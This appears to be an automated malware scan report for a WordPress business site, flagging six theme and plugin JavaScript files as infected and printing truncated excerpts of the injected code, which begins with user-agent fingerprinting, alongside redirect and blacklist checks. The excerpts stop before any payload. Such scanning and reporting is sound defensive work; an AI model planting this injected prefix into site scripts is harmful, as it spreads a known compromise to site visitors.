Scanned pages/files
Request | Server response | Status |
http://gestiondeempresas.org/ | 200 OK Content-Length: 42466 Content-Type: text/html | clean |
http://gestiondeempresas.org/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-content/plugins/jquery-image-lazy-loading/js/jquery.lazyload.min.js?ver=1.7.1 | 200 OK Content-Length: 5249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner prints only a truncated excerpt, which breaks off inside the see_agent list: (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/flexslider.js?ver=4.0 | 200 OK Content-Length: 43157 Content-Type: application/javascript | malicious |
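Malicious code - confirmed by antiviruses (see below). The excerpt is truncated: it runs from the start of the injected code to the see_agent list, then jumps to the end of the file: (function(){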
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' switch (options) { case "play": $slider.play(); break; case "pause": $slider.pause(); break; case "next": $slider.flexAnimate($slider.getTarget("next"), true); break; case "prev": case "previous": $slider.flexAnimate($slider.getTarget("prev"), true); break; default: if (typeof options === "number") $slider.flexAnimate(options, true); } } } })(jQuery); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/external.js?ver=4.0 | 200 OK Content-Length: 2401 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); if (!document.getElementsByTagName) return; var anchors = document.getElementsByTagName("a"); for (var i=0; i<anchors.length; i++) { var anchor = anchors[i]; if (anchor.getAttribute("href") && anchor.getAttribute("rel") == "external") anchor.target = "_blank"; } } window.onload = externalLinks; Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/suckerfish.js?ver=4.0 | 200 OK Content-Length: 2444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); var sfEls = document.getElementById("topnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/suckerfish-cat.js?ver=4.0 | 200 OK Content-Length: 2444 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } }; })(); var sfEls = document.getElementById("catnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/themes/wp-clear321/js/jquery.mobilemenu.js?ver=4.0 | 200 OK Content-Length: 3864 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var leonmain = 0; if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) { return leonmain; } return false; } function control_agent(){ var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD',' } $('<option />', { "value" : this.href, "html" : optText, "selected" : (this.href == window.location.href) }).appendTo( '.' + settings.className ); }); $('.' + settings.className).change(function(){ var locations = $(this).val(); if( locations !== '#' ) { window.location.href = $(this).val(); }; }); }); return this; }; })(jQuery); Antivirus reports:
| ||
http://gestiondeempresas.org/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 15248 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 9658 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/sobre-el-sitio/ | 200 OK Content-Length: 23795 Content-Type: text/html | clean |
http://gestiondeempresas.org/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://gestiondeempresas.org/sobre-el-sitio/gestion-de-empresas/ | 200 OK Content-Length: 38931 Content-Type: text/html | clean |
http://gestiondeempresas.org/contacto/ | 200 OK Content-Length: 23855 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gestiondeempresas.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 20:08:02 GMT
Server: nginx/1.6.2
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_2828210827=54383ca1a664f; expires=Fri, 10-Oct-2014 20:38:01 GMT; path=/; httponly
X-Pingback: http://gestiondeempresas.org/xmlrpc.php
GET / HTTP/1.1
Host: gestiondeempresas.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 20:08:02 GMT
Server: nginx/1.6.2
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_2828210827=54383ca1a664f; expires=Fri, 10-Oct-2014 20:38:01 GMT; path=/; httponly
X-Pingback: http://gestiondeempresas.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: gestiondeempresas.org
Referer: http://www.google.com/search?q=gestiondeempresas.org
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: gestiondeempresas.org
Referer: http://www.google.com/search?q=gestiondeempresas.org
Result:
The result is similar to the first query. No suspicious redirects were found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gestiondeempresas.org
Result: This site is not currently listed as suspicious.
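Result: This site is not currently listed as suspicious. A blacklist status reflects only what the list operator has detected so far; it does not override the six script files flagged as malicious in the scan above.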
Query: http://yandex.com/infected?l10n=en&url=http://gestiondeempresas.org/
Result: gestiondeempresas.org is not infected or malware details are not published yet.
Result: gestiondeempresas.org is not infected or malware details are not published yet.